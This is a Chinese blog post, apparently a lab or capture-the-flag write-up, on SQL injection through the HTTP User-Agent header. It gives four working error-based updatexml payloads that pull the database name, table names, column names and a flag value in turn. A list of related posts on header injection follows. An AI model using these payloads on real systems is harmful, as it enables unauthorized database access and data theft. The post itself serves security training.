18、SQL HEAD注入

最新推荐文章于 2024-08-12 15:40:55 发布
最新推荐文章于 2024-08-12 15:40:55 发布
阅读量390 收藏 3
点赞数
分类专栏: 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/songling515010475/article/details/106274414
版权

Head注入的区别与GET/POST的区别在于,HEAD时面的参数如果不存数据库,注入进去是没有任何意义的,而GET/POST在业务增删改查过种中上肯定会要操作数据库的,但现在软件一般都有日志记录,保存到数据库中。

虽然我知道 这是Head注入,但忍不住试一下POST能不能提交,哈哈被过滤了*

进入正题:

获取数据库库名

User-Agent:’ or updatexml(1,concat(0x7e,(select database())),1),1)#
User-Agent本身是用于后台识别客户端是用的什么浏览器访问的,比如有Wap(手机版),Firefox(火狐浏览器),Chrome(谷歌浏览器)等,每个浏览器都有一个自己的身份。所以一般存日志都会存你是用的什么内核浏览器访问的。所以这里把Agent的内容替换成是注入的sql。
注:

  • 这里语法比较复杂,特别要注意每个括号要成对匹配
  • 语句中有一个0x7e 这是十六进制参数“~”

 

获取表名

User-Agent:’ or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),1)#
这里一共有(flag_headipreferuagentuser 四个表)我要的数据可能在flag_head 或 uagent中。

 

获取表中的列

User-Agent:’ or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=’flag_head’ limit 1,1)),1),1)#

 

获取列数据

User-Agent:’ or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 0,1)),1),1)#

 

 

 

 

 

 

 

 

 

songling515010475
关注
专栏目录
SQL注入Head注入(一)
Mr.Huang_的博客
08-17 448
Head注入之User-Agent注入 靶场环境:http://inject2.lab.aqlab.cn:81/Pass-07/index.php 攻击流程 正确登录时用burp抓包。 测试head部分是否存在漏洞。 获取信息。 测试开始:   测试目标获取管理员账号密码   一些需要提前掌握的函数 组成 head中有访问者的各种信息,而通讯时我们若能抓到这些数据包,并将头部中这些身份信息修改则为HEAD注入。抓包实例如下(使用burp): 举列 就像图中User-Agent本意是表示你是哪种访问方式
head 注入
晨辰.的博客
03-21 5482
Head 注入
SQL注入----- head注入
weixin_45922278的博客
10-15 266
head注入 条件: 需要账号登入成功 有游客留言 有插入,储存,记录数据的功能select *from news where id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)解释:由于updatexml的第二个参数需要Xpath格式的字符串,以~开头的内容不是xml格式的语法, concat()函数为字符串连接函数显然...
SQL注入(head注入)---zkaq
weixin_38237216的博客
04-02 1975
1.概念 Head注入:当网站请求中的head信息与数据库有交互的情况下,就可以尝试head注入 常见的超全局变量: $_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取了 $_POST (获取POST传参) $_GET (获取GET的传参) $_COOKIE (获取COOKIE的值) $_SERVER (包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组) $_SERVER常见的用法:
Head注入
monkey:的博客
11-19 291
SQL注入——POST注入HEAD注入
weixin_46601374的博客
02-25 1723
POST注入如何注入 POST注入和普通注入一样,只是通过post提交数据,在提交的数据中进行注入。 post注入会出现在哪里 登录框,查询框等各种各样的框 万能密码原理 select username,password from users where username='admin' and password = ' 'or 1=1%23' limit 0,1(我们来看着语句逻辑,where后面是条件,username和password之间是and连接,所以两个有一个为否返回就是否,
SQL注入——POST HEAD注入
weixin_74991270的博客
10-10 256
熟练掌握POST、HEAD注入的步骤手工注入和工具联合使用更优秀。
封神台SQL注入-基础靶场1-Head注入
原味瓜子、的博客
10-10 1159
1111
SQL注入Head注入(三)
Mr.Huang_的博客
08-17 251
Head注入之ip注入 靶场环境:http://inject2.lab.aqlab.cn:81/Pass-09/index.php 在平时上网冲浪中,我们经常去访问一起网站,比如我们经常访问的百度 但是面对越来越多的用户来访问,如果只有一台服务器,那么肯定会崩掉, 那么就有很多台服务器来处理这些请求,以此来满足用户的需求, 1.通过代理来找到离用户最近的服务器。 你提出请求 > 代理商(CDN)> 最近服务器处理你的请求并返回你想要的数据 服务器只会记录下代理商的ip,而不会记录下你的ip,这就
SQL注入Head注入(二)
Mr.Huang_的博客
08-17 209
Head注入之Referer注入 靶场环境:http://inject2.lab.aqlab.cn:81/Pass-08/index.php 我们可以看到核心代码是插入uagent和uname 而uagent是来自HTTP_REFERER,获取上一次的URL地址(重哪一个页面跳转过来!) 这里和Head(一)只是位置换了,Head(一)是插入的请求头User-Agent,而Head(二)是插入的上一次的URL地址Referer, 那么方法还是一样的,就直接做最后一步 获取字段值 温馨提示: 这里因为是用up
head注入(一)
qq_45300786的博客
07-06 3709
head(一) 注入环境:http://inject2.lab.aqlab.cn:81/Pass-07/index.php 攻击流程:     1;正确登录时用burp抓包。     2;测试head部分是否存在漏洞。     3;获取信息。   测试开始:     测试目标获取管理员账号密码     一些需要提前掌握的函数 order by 原为排序,注入式用来判断字段数 union select 用来判断显示位置,和链表查询(需相同字段数量) information_schema mysql自带数据库
sql文件头注入
qq_44060093的博客
08-21 434
实验原理 1.常见的HTTP请求头有: (1)Host Host请求报头域主要用于指定被请求资源的Internet主机和端口号。 如:Host: localhost:8088 (2)User-Agent User-Agent请求报头域允许客户端将它的操作系统、浏览器和其他属性告诉服务器。登录一些网站时,很多时候都可以见到显示我们的浏览器、系统信息,这些都是此头的作用。 如:User-Agent: Mozilla/5.0 (3)Referer Referer包含一个URL,代表当前访问URL的上一个URL,也
SQL注入HEAD注入/POST注入/报错注入
m0_55854679的博客
01-07 3186
文章目录POST注入概述POST注入高危点post注入不能使用sqlmap的原因HEAD注入 常见web漏洞——SQL注入 POST注入 概述 POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别 get和post传参最大的区别是数据本身的编码问题(url编码) POST注入高危点 登录框 查询框 等各种和数据库有交互的框 post注入不能使用sqlmap的原因 sqlmap回应无法找到注入点,无法扫描。应该在后面添加--form,可以自动检测输入框,但是这种方法不稳,有时没
head头部注入、宽字节注入
qq_43238111的博客
05-24 490
head头部注入 原理 在传递参数时,利用请求头部参数传递参数,变成构造sql语句,然后发送执行sql语句 超全局变量是: $_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取了 $_POST (获取POST传参) $_GET (获取GET的传参) $_COOKIE (获取COOKIE的值) $_SERVER (包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组) $_SERVER功能强大。
POST注入/HEAD注入
cutjgh的博客
05-20 427
POST注入(本质是SQL注入) POST注入就是使用POST进行传参的注入,本质上与GET注入没有任何区别,注入语句在各种框里 在真实站点上,POST注入比GET注入多 POST注入高入点: 登录框 查询框 等各种和数据库有交互的框 表单在有些时候是GET传参 HEAD注入 HEAD注入 抓取的包中User_Agent,Referer,X_FORWARDED_FOR等都可能存在注入 实际上头注入就是将请求头中的数据放入数据库当作命令执行 updatexml() 更新xml文档的函数(当然还有别的报错函数,
SQL注入——POST注入 HEAD注入
weixin_41487522的博客
04-10 759
SQL注入——POST注入 HEAD注入 POST注入介绍 POST注入属于注入的一种,相信大家都知道POST和GET两种传参方式。 POST注入就是使用POST进行传参的注入,本质上和GET类型没什么区别。POST一般而言不会进行URL编码,但是GET会。 POST注入高危点: 登录框 查询框 各种与数据库有交互的框 最经典的POST注入莫过于万能密码: ’ or 1=1# 万能密码原理: se...
SQL注入head、报错、盲注)
最新发布
m0_74249600的博客
08-12 1719
本文讲述了head注入、报错注入以及时间盲注与布尔盲注等sql注入的基本注入类型,之后我会继续出sql注入知识点总结直至完整,请关注持续更新(本文内容来自课件,如有版权问题请与我联系)
渗透测试基础-Head注入
学习、分享、交流
05-16 908
前提:目标网址会记录你的一些head信息,放进数据库,那么只要放进数据库,就说明与数据库产生了交互。 --> 可能就存在数据库注入漏洞。
head注入(二)
qq_45300786的博客
07-06 411
head(一) 注入环境:http://inject2.lab.aqlab.cn:81/Pass-08/index.php 废话就不多说了,不懂的直接看上一篇head(一) 我们可以看到核心代码是插入uagent和uname 而uagent是来自HTTP_REFERER,获取上一次的URL地址 这里和head(一)只是位置换了,head(一)是插入的请求头,而head(二)是插入的上一次的URL地址, 那么方法还是一样的,就直接做最后一步 获取字段值 注意 这里因为是用updatexml函数报错输出我们想
渗透测试基础-HEAD注入
weixin_45488495的博客
04-08 1156
渗透测试基础-HEAD注入PHP的超全局变量 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 在讲解HEAD注入前,得明白一些前提知识:PHP的超全局变量 PHP的超全局变量 在php中的许多预定义变量都是“超全局的”,这意味着他们在一个脚本的全部作用域中都可以使用。 创建的一些超全局变量: $_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取 $_POST (获取POST传参) $_GET (获
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值